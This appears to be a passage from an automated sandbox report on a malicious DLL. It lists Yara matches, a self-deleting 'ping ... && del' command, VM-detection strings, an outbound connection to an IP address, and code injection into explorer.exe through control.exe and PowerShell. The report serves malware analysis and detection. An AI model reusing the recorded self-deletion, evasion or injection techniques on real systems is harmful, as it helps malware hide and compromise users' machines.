                      Source: Yara matchFile source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6852Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6852Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5887
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3535
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: explorer.exe, 0000001D.00000000.464459722.0000000005454000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
                      Source: explorer.exe, 0000001D.00000000.433226771.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001D.00000000.433299138.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: RuntimeBroker.exe, 00000025.00000000.589637413.000001F9B9A61000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001D.00000000.461594936.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: e-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
                      Source: rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352389329.0000000003305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000001D.00000000.433299138.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 0000001D.00000000.461594936.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}on:Mondz?S
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03478FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF62CE012E0
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 4B0000
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF62CE012E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 360000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2490000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 35E000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 4B0000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: 4B0000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 4B0000 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 360000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 2490000 value: 80
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 35E000 value: 00
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 4B0000 value: 80
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4084
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3616
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3616
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580
